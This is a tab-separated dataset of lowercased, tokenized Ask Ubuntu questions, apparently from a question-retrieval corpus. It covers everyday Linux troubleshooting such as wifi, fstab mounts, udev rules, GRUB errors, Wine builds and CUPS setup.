445704	terminal - cycle through possible options	in the terminal i use bind ' '' \t '' : menu-complete ' to auto complete my commands using the tab key . if i hit the tab key again , it shows the next choice . sometimes i miss the entry and i have to go through the whole list again . it would be nice if i could cycle backwards using shift + tab . is that possible ?
445705	enable networking	i 'm trying ubuntu on an hp atom mini-laptop . i boot from a usb stick . the network is disabled and i ca n't get it enabled . available wi-fi networks are not displayed . is networking limited/restricted when trying ubuntu ?
445706	why is my wireless network no longer listed in networkmanager	i have a problem where i 'm getting disconnected from my wireless network . if i look in the list of networkmanger it is no longer there , but if i run iwlist wlan0 scan it is found . $ iwlist wlan0 scan | grep upc241546362 essid : '' upc241546362 '' $ nm-tool | grep upc241546362 $ note that nm-tool is showing a number of other wireless networks . when i disable then enable wireless networking through nm in the icon-tray , the network is found again and the connection is reestablished . does anybody have an idea what 's going on and how to fix it ?
445710	how to patch ubuntu eol for heartbleed / cve-2014-0160 ?	i still have an ubuntu 13.04 raring ring server that i am running . i need to patch it for heartbleed / cve-2014-0160 bug , but canical no longer is supporting it . what do i do ? references : http : //www.ubuntu.com/usn/usn-2165-1/ how to patch cve-2014-0160 in openssl ?
445712	ubuntu update overwrote mbr , but did it make backup ?	i had ubuntu 12.04 ( 32-bit ) with windows 7 working with multiboot setup on computer with mcafee endpoint encryption . only windows 7 partition was encrypted together with mee bootloader being on mbr . i decided to install updates and noticed that mbr got overwritten . did ubuntu update store the original/previous mbr somewhere ? steps : used ubuntu update manager
445717	error while trying to make avd work	i managed to install the latest version of eclipse and make it work correctly , along with the sdk manager . i downloaded all the necessary bits . when i attempt to run the avd ( android virtual device ) manager , all is well . it reads the builds of the android api and allows me to create the emulator profile but when i attempt to run the emulator i get the following error : failed to start emulator : can not run program '' /opt/sdk//tools/emulator '' : error=2 , no such file or directory the problem is obviously the extra slash . i have ensured that there is no trailing slash in the sdk path ( in the eclipse prefs ) and i cant think of where its coming from ... any ideas ? edit 3 the following commands have been run : cromwell @ terminal-0 : ~ $ sudo chown -r root : eclipse /opt/* cromwell @ terminal-0 : ~ $ sudo chmod -r 775 /opt/* cromwell @ terminal-0 : ~ $ sudo chmod +x /opt/* edit 4 if it makes a difference , it was a manual install ( probably not done correctly ) i copied the files ( for the sdk and eclipse ) to /opt and ran the edit 3 commands . the jdk was installed using a ppa but there is also a copy under /opt/eclipse/jre ... the following 2 pages aided me in installation : http : //www.webupd8.org/2012/09/install-oracle-java-8-in-ubuntu-via-ppa.html https : //wiki.ubuntu.com/fballem/software % 2012.04 # eclipse im also using the latest kubuntu 13.1 64 bit ... could that be part of the problem ? edit this is the output from the console cromwell @ terminal-0 : ~ $ sudo /opt/sdk/tools/emulator [ sudo ] password for cromwell : sudo : unable to execute /opt/sdk/tools/emulator : no such file or directory i feel like there 's something funny ( not funny `` ha-ha '' ) going on since there is in fact such a file in that directory edit 2 console output in response to a comment cromwell @ terminal-0 : ~ $ ls -l /opt/sdk/tools/ total 18272 -rwxrwxr-x 1 root eclipse 323 mar 21 15:17 adb_has_moved.txt -rwxrwxr-x 1 root eclipse 3498 mar 21 15:17 android drwxrwxr-x 2 root eclipse 4096 mar 21 15:17 ant drwxrwxr-x 3 root eclipse 4096 mar 21 15:17 apps -rwxrwxr-x 1 root eclipse 3286 mar 21 15:17 ddms -rwxrwxr-x 1 root eclipse 49112 mar 21 15:17 dmtracedump -rwxrwxr-x 1 root eclipse 1940 mar 21 15:17 draw9patch -rwxrwxr-x 1 root eclipse 37338 mar 21 15:17 emulator -rwxrwxr-x 1 root eclipse 2854385 mar 21 15:17 emulator64-arm -rwxrwxr-x 1 root eclipse 2884527 mar 21 15:17 emulator64-mips -rwxrwxr-x 1 root eclipse 2955802 mar 21 15:17 emulator64-x86 -rwxrwxr-x 1 root eclipse 2706381 mar 21 15:17 emulator-arm -rwxrwxr-x 1 root eclipse 2679855 mar 21 15:17 emulator-mips -rwxrwxr-x 1 root eclipse 2809004 mar 21 15:17 emulator-x86 -rwxrwxr-x 1 root eclipse 170613 mar 21 15:17 etc1tool -rwxrwxr-x 1 root eclipse 3464 mar 21 15:17 hierarchyviewer -rwxrwxr-x 1 root eclipse 10566 mar 21 15:17 hprof-conv -rwxrwxr-x 1 root eclipse 1845 mar 21 15:17 jobb drwxrwxr-x 8 root eclipse 4096 mar 21 15:17 lib -rwxrwxr-x 1 root eclipse 2046 mar 21 15:17 lint -rwxrwxr-x 1 root eclipse 11819 mar 21 15:17 mksdcard -rwxrwxr-x 1 root eclipse 1293 mar 21 15:17 monitor -rwxrwxr-x 1 root eclipse 3176 mar 21 15:17 monkeyrunner -rwxrwxr-x 1 root eclipse 695122 mar 21 15:17 notice.txt drwxrwxr-x 7 root eclipse 4096 mar 21 15:17 proguard -rwxrwxr-x 1 root eclipse 70 mar 21 15:17 source.properties -rwxrwxr-x 1 root eclipse 681566 mar 21 15:17 sqlite3 drwxrwxr-x 2 root eclipse 4096 mar 21 15:17 support drwxrwxr-x 6 root eclipse 4096 mar 21 15:17 templates -rwxrwxr-x 1 root eclipse 3219 mar 21 15:17 traceview -rwxrwxr-x 1 root eclipse 3054 mar 21 15:17 uiautomatorviewer -rwxrwxr-x 1 root eclipse 65552 mar 21 15:17 zipalign ... .. cromwell @ terminal-0 : ~ $ ls -l /opt/sdk/tools/emulator -rwxrwxr-x 1 root eclipse 37338 mar 21 15:17 /opt/sdk/tools/emulator
445721	problems while using an ssd . some hdd and ssd partitions fail to mount	i just added a new ssd drive and copied all the root files to it , edited fstab and updated the grub . now the system is booting but some partitions fail to mount including 1 ssd partion and the swap partition which is in the old hdd . during boot i get this error : the disk drive for uuid=731f3b08-ae9f-4e0e-ae1e-ef89e2acbc2e is not ready or not present . also get a similar message for /mnt/ssddata . how can i fix this ? my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=53a51f96-91a8-40fe-9001-e23b5345648d / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda2 during installation uuid=2acd-f70c /boot/efi vfat defaults 0 1 # /home was on /dev/sda7 during installation uuid=05f57dcf-0d25-48e6-b10f-22403207f548 /home ext4 defaults 0 2 # swap was on /dev/sda10 during installation uuid=731f3b08-ae9f-4e0e-ae1e-ef89e2acbc2e none swap sw 0 0 /dev/disk/by-uuid/04e03baee03ba4b8 /mnt/data auto nosuid , nodev , nofail , x-gvfs-show , x-gvfs-name=data , x-gvfs-icon=data 0 0 /dev/disk/by-uuid/b2c6d17dc6d14271 /mnt/b2c6d17dc6d14271 auto nosuid , nodev , nofail , x-gvfs-show , ro 0 0 /dev/disk/by-uuid/13b5fbd9-9f8e-495e-abe8-36dec9db8e9d /home/ssd auto nosuid , nodev , nofail , x-gvfs-show , x-gvfs-name=ssd , x-gvfs-icon=ssd 0 0 /dev/disk/by-uuid/2066a69f-8284-4c83-8bfd-9c33453255b8 /mnt/ssddata auto nosuid , nodev , nofail , x-gvfs-show , x-gvfs-name=ssddata , x-gvfs-icon=ssddata 0 0 /dev/disk/by-uuid/5c612d17-386b-4c04-9bc3-b1b27a46955a /mnt/ssddata auto defaults 0 0 the blkid output : /dev/sda1 : uuid= '' 53a51f96-91a8-40fe-9001-e23b5345648d '' type= '' ext4 '' /dev/sda2 : uuid= '' 5c612d17-386b-4c04-9bc3-b1b27a46955a '' type= '' ext4 '' /dev/sdb1 : uuid= '' 44c8cbf8c8cbe670 '' type= '' ntfs '' /dev/sdb2 : uuid= '' 2acd-f70c '' type= '' vfat '' /dev/sdb4 : uuid= '' b2c6d17dc6d14271 '' type= '' ntfs '' /dev/sdb5 : uuid= '' b4ead41cead3d8a6 '' type= '' ntfs '' /dev/sdb6 : uuid= '' caef6612-a2b3-440a-833c-18b3317cf461 '' type= '' ext4 '' /dev/sdb7 : uuid= '' 05f57dcf-0d25-48e6-b10f-22403207f548 '' type= '' ext4 '' /dev/sdb8 : uuid= '' 179768ad-16ec-4c94-b9a1-cf1d12736dbc '' type= '' swap '' /dev/sdb9 : label= '' data '' uuid= '' 04e03baee03ba4b8 '' type= '' ntfs '' /dev/sdb10 : uuid= '' 9688d65f-5b72-434d-b5dc-688aeec47756 '' type= '' ext4 '' /dev/sdb11 : uuid= '' f2af0b4d-3c39-41a5-ab5a-75d291c1fb14 '' type= '' ext4 ''
445725	bash completion for the new apt command	i like the new apt command ( which will be included in the upcoming trusty release ) so much that i installed it on my precise system by compiling the 14.04 package from source . unfortunately , bash does n't know how to complete arguments for apt , like it does for apt-get . how can i teach bash how to complete arguments for apt ?
445730	issue using node.js / express , says it 's not installed	i am having the same issue this this person had . npm installed packages are not accessible where the command `` express nodepad '' does not work . it give an error that `` the program 'express ' is currently not installed . you can install it by typing : sudo apt-get install node-express '' however , i did install it using npm with this command `` sudo npm install -g express '' . when i did ran `` sudo npm install -g express '' there were no warnings or errors . what am i missing ? maybe i 'm not express correctly ? i was following along with this tutorial . http : //dailyjs.com/2010/11/08/node-tutorial-2/ but where he did `` npm install express mongoose jade less expresso '' i installed each one separately using a sudo and the -g option . however , when i get to his command `` express nodepad '' i get the error . i have also tried to sudo the command and get the message `` sudo : express : command not found '' any help would be greatly appreciated .
445732	apt-get error 'failed to fetch '	i 'm getting the following error when i try to use apt-get . i 'm trying to do an update . due to my rep being so low , i only left the line with the error . killingthemonkey @ travellingmonkey : ~ $ sudo apt-get update err http : //extras.ubuntu.com saucy release fetched 836 kb in 12s ( 65.8 kb/s ) reading package lists ... error ! w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com saucy release : the following signatures were invalid : nodata 1 nodata 2 w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/saucy/release w : some index files failed to download . they have been ignored , or old ones used instead . e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists /extras.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . killingthemonkey @ travellingmonkey : ~ $ sudo apt-get install reinstall software-center [ sudo ] password for killingthemonkey : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists /extras.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened .
445735	why do my udev rules run if i use udevadm trigger , but not at boot time ?	i 'm having trouble with udev rules not running . here 's an example : i have a rule /etc/udev/rules.d/99-test.rules which contains : action== '' add '' , subsystem== '' pci '' , attr { vendor } == '' 0x8086 '' , run+= '' /sayhi '' and sayhi just has : # ! /bin/bash date + '' % y- % m- % d % h : % m : % s , % 3n '' > > /saidhi this being an intel machine , i obviously have many vendor 0x8086 pci devices : root @ imtrobot : ~ # lspci -n |grep 8086 00:00.0 0600 : 8086:2770 ( rev 02 ) 00:02.0 0300 : 8086:2772 ( rev 02 ) 00:1d.0 0c03 : 8086:27c8 ( rev 01 ) [ etc . 12 lines total ] and yet , when i boot , /saidhi will either not be created at all , or will have 1 or 2 date lines in it . if , after booting , i run udevadm trigger -- action=add -- subsystem-match=pci then /saidhi will get exactly the right number of dates added to it . why does n't this work during the boot process ?
445740	ubuntu system messed up !	i decided to install fluxbox on my system recently , just to try it out , so i installed it and everything executed fine . i logged into the fluxbox desktop and messed around with it for a while , then shut the computer down . the next time i started up my laptop i booted into gnome fallback and all the graphics were messed up . it was a black screen , with no borders , the only thing on the screen was my curser . i tried all the normal approaches to graphics problems , resetting unity ( i know gnome fallback does n't use it but whatever ) , and removing and re-installing all the xorg drivers . the only thing that changed is when i login to any desktop ( gnome , ubuntu , etc . ) the screen shows some text that blinks once and disappears , then kicks me back to the login screen . i have no idea what to do at this point , and i do n't want to delete and re-install ubuntu and lose all my data . please help !
445745	hp pavilion dv7 - ubuntu 13.10 - wil not wake on lan	i am using my old dv7 as a htpc running xbmc . it will wake on ir , but not by wol . it also wakes if i open the lid . i am using the nvidia drivers , even finally got hdmi audio out working after alot of struggling . ethtool eth0 gives : settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full link partner advertised pause frame use : symmetric link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes there is no option in my bios to enable power on ethernet . but by the wake-on : g in ethtool it looks like it should work . all of my other ubuntu machines do it fine . where should i look to fix this ?
445748	ubuntu ca n't see any of my files	i just installed ubuntu and i am enjoying its refreshing look . however when i click pictures or videos nothing loads at all . even my downloads folder shows as empty . where are all my files from my windows account ? it 's just me on the computer and no other user . why is this happening and how can i fix it ? also where are all my files i created in windows like my my documents folder and subfolders in my my documents folder .
445749	what 's the difference between shell builtin and shell keyword ?	when i run these two commands , i get $ type cd cd is a shell builtin $ type if if is a shell keyword it is clearly shown that cd is a shell builtin and if is a shell keyword . so what is the difference between shell builtin and keyword ?
445753	how to list all the shell keywords ?	$ type if if is a shell keyword i do n't know the other shell keywords . is there any command to list all the bash shell keywords. ? note : help -m displays both shell builtins and shell keywords .
445756	there is a problem to install ubuntu in acer aspire 4736z	i have a laptop brand acer model 4736z . i use intel dual-core , 1gb ram and 160gb hard disk . currently i use windows 7 ultimate . i want to change my os into ubuntu and i have put the .iso file into my usb thumb drive . i have tested my ubuntu.iso that i 've stored into my usb to other computer and it was run pretty well . but when i tested it at my acer ( the model as i mentioned before ) , after i choose my language at select language menu , my acer turned blank but the power is still on . so , i just want to know , is it my acer 's hardware problem or my usb 's speed problem ? because my usb size is 8gb and for me it is faster enough to run the ubuntu iso file .
445757	click lock to drag in ubuntu 13.10	i 've been looking for a while now a way to get the `` click lock '' in ubuntu 13.10 ( for dragging ) but so far , i have no success . universal access lacks this feature , and i have not found some program or utility that allows me simulate it . according to this question , it seems that in ubuntu 10.10 there was no way to get it working , but i wonder if this issue has been addressed in the latest versions . with this command , xte `` mousedown 1 '' i get the desired functionality , but still you would need to type the command on a terminal or bind it to a key . is there a way to get the same functionality by long pressing the button click ? thanks for any help .
445758	uninstalling `` previous install of the fglrx driver ''	firefox on ubuntu is rendering pages extremely slowly despite having a decent connection . after some googling , i found out that this is probably due to my not having installed my grapic card driver . i attempted to install the default driver , but that did n't work . so i tried installing the one that you can download in the ubuntu software center , but that did n't help either . finally , i downloaded the `` amd catalyst邃｢ 13.12 proprietary linux x86 display driver '' . i may have run it last night , but i could n't swear on it . anyway , after trying to install this driver i get this in response : '' a previous install of the fglrx driver has been detected . please uninstall the older version before installing this version . optionally run the installer with -- force option to overwrite the existing driver . forcing install is not recommended . see /user/share/ati/fglrx-install.log for more details. '' . after checking /user/share/ati/fglrx-install.log , it tells me the exact same thing . i ran this .run the easy way , by just double clicking it窶馬ot by running it in the terminal . how could i either a ) uninstall the previous version and try installing the driver again , or b ) use the -- force command in the terminal ? thanks in advance~
445759	modem or mobile broadband showing differect ip address	my modem or mobile broadband is perfectly connects with internet but i unable to install anything via terminal in connection information it shows the ip address 115.243.74.182 but in termainal it shows this connecting to 192.168.100.3 whic is the ip address of wifi provided by college how can i fix it ? ? please help me..
445763	how do i batch rename files ?	i have a few hundred files named hortstu01-01-14 then hortstu01-02-14 ... do you get the idea ? well half of the files are named hortstu_01-03-14 then hortstu_01-04-14 . this messes up sorting the files by name and getting them in the order i 'd prefer them to be . so i 'd like to rename the ones without the underscore to hortstu_ is it possible to do this in a batch operation ? if so how ?
445764	not able to install ubuntu 12.04 using wubi	i am trying to install ubuntu 12.04 in my windows machine using wubi . it 's not the first time i am trying to install using wubi , i have done that before but i am facing some issues this time ... i have downloaded ubuntu-12.04.4-desktop-amd64.iso ( in zip ) from the ubuntu 's website . after extracting all the files when i am trying to run wubi.. it 's giving an error : with my internet connection on , wubi downloads a file.. but at the end of downloading , this gives `` permission denied '' error . i also searched a lot , and tried different ways like putting the latest wubi in the folder . but nothing worked for me.. any suggestion ? ? a question here , i have already downloaded iso zip but wubi still searching for another disc image file.does n't it come in the iso zip files ? ?
445767	map mouse button to right click	i 'm looking for a way to map a mouse button to simulate the right click ( contextual menu ) in ubuntu 13.10 . in windows i can achieve this with autohotkey in an easy way , just by adding this line ( xbutton2 : :lbutton ) to the script file . by executing xev in the terminal , i know that the physical button of my mouse is detected with id=11 . i wonder if there is a way in ubuntu to map button : id=11 to button : id=3 , or something like that .
445770	urgent ! grub error : no such device	i 've been using windows on my new computer for about 3 days , and now i decided to install ubuntu . now , i keep seeing the no such device error when trying to boot it up . i made a dumb decision and installed the bootloader on the same drive as the windows bootloader , and i can not boot into windows either . i have two hard drives , one ssd and one hdd . i created a partition on the hdd , formated it as ext4 and installed ubuntu on it . i chose the ssd for the bootloader location . after i booted from the cd a couple of times and decided to attempt to reinstall it , when it asked what i want to do , it said it did not detect any existing operating systems . i have checked the ssd from inside ubuntu , and it seems that it still contains the windows files , as well as a folder called ubuntu . i looked all over the internet , and ca n't find anything of use . i am starting to panic , so i rather avoid doing anything else myself before getting a response from a more experienced user . i want to revert what i 've done , and keep on using windows . i would very much appreciate a fast response .
445773	usb isues with ubuntu 12.04 new install	i just installed 12.04 from scratch/clean install . but it is not recognizing my external hdds i ran the command sudo lsusb and pluged and unplugged my devices a external hdd 1tb and a 32gb flash drive the hdd is formatted with ntsc and mac partition . also when i start the computer up on the sign-in screen it takes like a full minute for the keyboard to register . so it seems there is an issue of unrecognised usb ports ... i will appreciate the help i love linux and ubuntu but there seems to always be glitches..
445774	where can i find linux drivers for samsung rv 413 ?	i am really fond of linux , but i need appropriate drivers for my samsung rv 413 laptop , especially the sound driver . could anyone give me a method , or a link to find drivers for ubuntu or other unix-like os ?
445778	help me to know ubuntu	please help me to find the way to know about linux ( ubuntu ) and everything associated with that . i want to know about the internal working of ubuntu and how to manage it . i am a computer student and want to know everything about linux .
445779	ca n't connect to configure cups through web interface	i 'm trying to connect an old hp laserjet 1000 printer on a new windows machine . the printer has n't had any new drivers since xp . i found a solution online with this recommendation but i 'm getting bogged down in details . i am a complete novice to this . i 've installed ubuntu server 10.04 on virtualbox . during the installation of ubuntu , i selected print server for software selection . i have also subsequently installed foo2zjs and cups from the os . i took the ipv4 address for the virtualbox by running ipconfig in the windows command prompt ; i added this address to /etc/cups/cupsd.conf : listen 192.168.56.1:631 i have also alternatively omitted the above line and left the original `` port 631 '' line . i have always left the `` listen /var/run/cups/cups.sock '' line . i also changed all of the `` allow @ local '' lines in the three locations to `` allow all '' . i then re-started the cups server with sudo /etc/init.d/cups restart . when i open a browser on the windows machine , i ca n't connect to the cups web interface . i 've tried the following : 192.168.56.1:631 localhost:631 localhost:631/admin lj1000-server:631 i also tried using the inet address 10.0.2.15 listed from ifconfig from the ubuntu terminal prompt instead of the 192.168.56.1 listed for the virtualbox . any suggestions on what i 'm missing ? [ edit : ] i have now also forwarded port 631 on my router for ip address 192.168.56.1 as well as adding inbound and outbound rules on windows firewall to allow connections with protocol type tcp on local/remote ports 631 on local/remote ip address 192.168.56.1 . still nothing yet .
445783	the touchpad does not work after disabling it	my touchpad does not work after i disable it for the first time i 'm using ubuntu . until now , i just ca n't use the pad . i have dual boot ( windows 7 and ubuntu 12.04 lts ) , my touchpad works fine on windows 7 even i disable and enable it back , but when i turn on into ubuntu again , the touchpad 'dead ' . i have enable it , there are icon appears shows that was enable , but still , ca n't be use . anybody can help ? ( read below ) neverfine , i just found my own solution . i put in here just in case somebody need that solution right away . heres the solution i found and works for me . install ubuntu however you wish , whether it be via wubi or with the install dvd , it really doesn’t matter . press enter to select your user in the login menu , and type your password then hit enter again to login to ubuntu . type in alt + f2 , and a small window should pop up . press tab until you highlight the small tick box saying “run in terminal” and press enter . use tab to cycle through the menu again until you reach the main bar , and type “sudo -s” and press enter , then type in your password in the terminal that appears . once logged in as the root user , type gedit /etc/default/grub and press enter , and a window should appear to the right of your terminal window . use the arrow keys of your keyboard to navigate down to the line “grub_cmdline_linux=” '' ” and place your indicator between the “” . it’s something like press the down key 9 times , then hit the right key 20 times . now between the two speech marks , change the line to grub_cmdline_linux=”i8042.reset i8042.nomux i8042.nopnp i8042.noloop” press ctrl + s to save the grub menu , and then alt + f2 to be able to open another small window like earlier . once again , use tab to select the “run in terminal” option , and enter to select it , then cycle back to the main bar . type in sudo update-grub and once again , enter your password in terminal , and your new terminal window should close shortly after . now press your laptop power button once , and you should see the shutdown menu of ubuntu and just use the down key to select restart , and press enter . ( note : if you press the power button and no menu appears , hold the power button for 5 seconds to force restart , then just boot back to ubuntu from the boot menu ) after the restart , boot back into ubuntu , and you should have full touchpad detection and capability . anyway , thanks for your all helps . since i ca n't wait for 8 hours , so i put the solution right in the thread also . this problem now solved ! ( edited after real thread solution founded ! )
445784	turned off wifi in windows , formated drive , ca n't turn on in ubuntu	so ... i may have made a huge mistake . i ca n't get my wifi working on my work lonovo t410 after formatting the drive with windows 7 on it . i think the wifi may have been shut off when i obliterated the old install ... here 's what i know , when i run lshw -c network , i get this output : *-network disabled description : wireless interface product : centrino advanced-n 6200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 35 serial : 00:27:10 : d7 : b1 : a0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-15-generic firmware=9.221.4.1 build 25532 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:43 memory : f2400000-f2401fff so it looks like there is a driver there , and it is installed correctly . though if anyone has guidance beyond ubuntus own troubleshooting guide , i 'd love to hear it . i got this laptop to take to a programming conference this weekend , and wanted to quickly get ubuntu up and running so that i could be productive when i got there . in my rush i formatted the drive and threw ubuntu 12.04 onto the laptop . small problem , the windows 7 install was a fully configured install ( they 're just going to flash the laptop when i give it back , so no worries there . ) i think they had the wifi turned off for security purposes ... so now i ca n't turn the wifi on , no matter what i do . the end of ubuntu 's official documentation says to just go to the old os and turn the wifi on , but i do n't have that option anymore ( out of time ... ) . does anyone know how to just force the wifi back on ?
445787	installing oracle 10g se on ubuntu 12.04	i want to install oracle 10g standard edition on my ubuntu 12.04lts . i 've searched through various sites . oracle is installed on my machine but while creating starter database , screen just sits idle and nothing happens further . please help .
445788	how do i install `platypus` ( and naturallyspeaking 12 premium ) on ubuntu 13.10 x64 ?	for the record , i have all of the following packages installed on my machine : wine wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-dev wine1.4-i386-i386 winetricks i created a 32-bit wine prefix using $ wineprefix='/home/philvollman/.dictation ' winearch='win32 ' wine 'wineboot' i have a legally acquired copy of dragon naturallyspeaking 12 premium . when i tried to install naturallyspeaking , i got this error , and this screen : however , there was no rollback and i was able to start and register my copy of naturallyspeaking , which promptly stopped working thereafter : after i installed naturallyspeaking , i ran ls -al and found that my .dictation folders had the following top-level contents : total 1816 drwxrwxr-x 4 philvollman philvollman 4096 apr 10 00:56 . drwxr-xr-x 63 philvollman philvollman 4096 apr 10 00:27 .. drwxrwxr-x 2 philvollman philvollman 4096 apr 10 00:27 dosdevices drwxrwxr-x 5 philvollman philvollman 4096 apr 10 00:28 drive_c -rw-rw-r -- 1 philvollman philvollman 1754254 apr 10 00:39 system.reg -rw-rw-r -- 1 philvollman philvollman 11 apr 10 00:27 .update-timestamp -rw-rw-r -- 1 philvollman philvollman 2376 apr 10 00:34 userdef.reg -rw-rw-r -- 1 philvollman philvollman 75517 apr 10 00:39 user.reg the platypus installation directions told me to install platypus as such : export wineprefix= $ home/.dictation ./configure make make install when i do this from inside the platypus folder , i get : looking for winegcc ... ( ok ) checking wineprefix ... ( ok ) checking libdir ... /usr/lib checking winelib ... /usr/lib/wine/libwinecrt0.a not found ! error : install wine-devel 32 bit or try one of these ./configure options : configure options : -- prefix=/usr -p look for libraries starting in /usr -- libdir=/lib -l look for libraries in $ prefix/lib -- winelib=/opt/wine -w location of libwinecrt0.a -- with-64bit -64 compile as 64 bit -- xincdir=/opt/include -x optional includes in /opt/include -- help -h this help message update when i specify what i believe is the correct wine library , this happens : philvollman @ phil-hp-envy : ~/downloads/platypus $ ./configure -- libdir=/usr/lib/i386-linux-gnu/ looking for winegcc ... ( ok ) checking wineprefix ... ( ok ) checking libdir ... /usr/lib/i386-linux-gnu/ checking winelib ... ( ok ) checking xorg-proto ... ( ok ) checking libx11 ... /usr/lib/i386-linux-gnu//libx11.so not found ! error : install libx11-devel 32 bit or try one of these ./configure options : configure options : -- prefix=/usr -p look for libraries starting in /usr -- libdir=/lib -l look for libraries in $ prefix/lib -- winelib=/opt/wine -w location of libwinecrt0.a -- with-64bit -64 compile as 64 bit -- xincdir=/opt/include -x optional includes in /opt/include -- help -h this help message update # 2 philvollman @ phil-hp-envy : ~ $ sudo apt-get install wine-dev & & sudo apt-get install libx11-dev & & sudo apt-get install libxtst-dev & & sudo apt-get install xserver-xorg-dev & & sudo apt-get install x11proto & & sudo apt-get install x11proto-core-dev [ sudo ] password for philvollman : reading package lists ... done building dependency tree reading state information ... done note , selecting 'wine1.4-dev ' instead of 'wine-dev' wine1.4-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . reading package lists ... done building dependency tree reading state information ... done libx11-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . reading package lists ... done building dependency tree reading state information ... done libxtst-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . reading package lists ... done building dependency tree reading state information ... done xserver-xorg-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package x11proto philvollman @ phil-hp-envy : ~ $ so , what do i do ? i see that the platypus team writes that i need to install wine-devel , xorg-x11-proto-devel , libx11-devel , and libxtst-devel , but none of these packages appear to be available via synaptic .
445791	how do i configure java security settings , etc ?	i have installed jdk 7 , but how do i configure settings like security , etc ? on windows , i can set up jdk 7 from control panel - > java .
445794	installing imagemagick on user account	the version of imagemagick on the machine i am using is too old for the operation i am trying to execute . i do not have admin privileges and the sysadmin will not upgrade imagemagick . how do i install a newer version of imagemagick on my own account ? the process i tried was as follows : $ wget http : //www.imagemagick.org/download/imagemagick.tar.gz $ tar xvzf imagemagick.tar.gz $ cd imagemagick-6.8.8-10/ $ ./configure $ make $ make prefix=/home/josh/bin install make install-recursive make [ 1 ] : entering directory `/home/josh/imagemagick-6.8.8-10' making install in . make [ 2 ] : entering directory `/home/josh/imagemagick-6.8.8-10' make [ 3 ] : entering directory `/home/josh/imagemagick-6.8.8-10' /bin/mkdir -p '/usr/local/lib' /bin/sh ./libtool -- mode=install /usr/bin/install -c magick/libmagickcore-6.q16.la wand/libmagickwand-6.q16.la magick++/lib/libmagick++-6.q16.la '/usr/local/lib' libtool : install : /usr/bin/install -c magick/.libs/libmagickcore-6.q16.so.2.0.0 /usr/local/lib/libmagickcore-6.q16.so.2.0.0 /usr/bin/install : can not create regular file `/usr/local/lib/libmagickcore-6.q16.so.2.0.0 ' : permission denied make [ 3 ] : *** [ install-libltlibraries ] error 1 make [ 3 ] : leaving directory `/home/josh/imagemagick-6.8.8-10' make [ 2 ] : *** [ install-am ] error 2 make [ 2 ] : leaving directory `/home/josh/imagemagick-6.8.8-10' make [ 1 ] : *** [ install-recursive ] error 1 make [ 1 ] : leaving directory `/home/josh/imagemagick-6.8.8-10' make : *** [ install ] error 2
445795	determine which device resumed pc from suspend	i 'm running ubuntu 13.10 as a htpc and have configuring the pc to resume from suspend in order to record scheduled live tv programs . this part works fine . what i want to do now is determine what caused the pc to resume from the suspend state . how can i tell if resume from suspend was caused by the real-time clock ( rtc ) using rtcwake , the power button or the usb keyboard ? i 've checked the pm-powersave and pm-suspend logs but nothing is jumping out at me . the reason i need this is that if the rtc caused the resume then after recording i can suspend the pc again , otherwise i can leave it powered on . i 'd be thankful for any tips you can provide .
445798	where is the information stored in the usb core regarding the class driver and the hcds , for it to check ?	obvious by the question , does the usb core have an array or something ( maybe a linked list ) where all the class drivers ' information and hcd 's information ( a name or some kinda number ) is stored so that it checks and assign the required when a device is plugged in ?
445802	ubuntu problem once it hit the memory stick	i finally download ubuntu on my memory stick , but my problem is installing it on my windows xp laptop.ipush f-12 , f-8 and f-2 to get to the bio screen . how can i get ubuntu installed on my windows xp laptop from my memory flash stick
445803	how can i fix `` errors were encounterd while processing : mmodemanager whoopsie	i am using an ubuntu 13.10 image on my android and i cant seem to install the ubuntu gnome desktop . device information : - sony xperia s ( lt26i - arm-v7 - snapdragon s3 1.83ghz - adreno 220 gpu - four armhf cpus ubuntu information : - linux 3.40 kernel - version 13.10 envi @ ubuntu : ~ $ adb shell * daemon not running . starting it now on port 5037 * * daemon started successfully * shell @ android : / $ su root @ android : / # linux shell starting shell as root @ localhost root @ localhost : / # sudo apt-get install gnome-shell ubuntu-gnome-desktop reading package lists ... done building dependency tree reading state information ... done gnome-shell is already the newesshell startingt version . ubuntu-gnome-desktop is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/300 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing modemmanager ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . setting up whoopsie ( 0.2.24.1 ) ... invoke-rc.d : unknown initscript , /etc/init.d/whoopsie 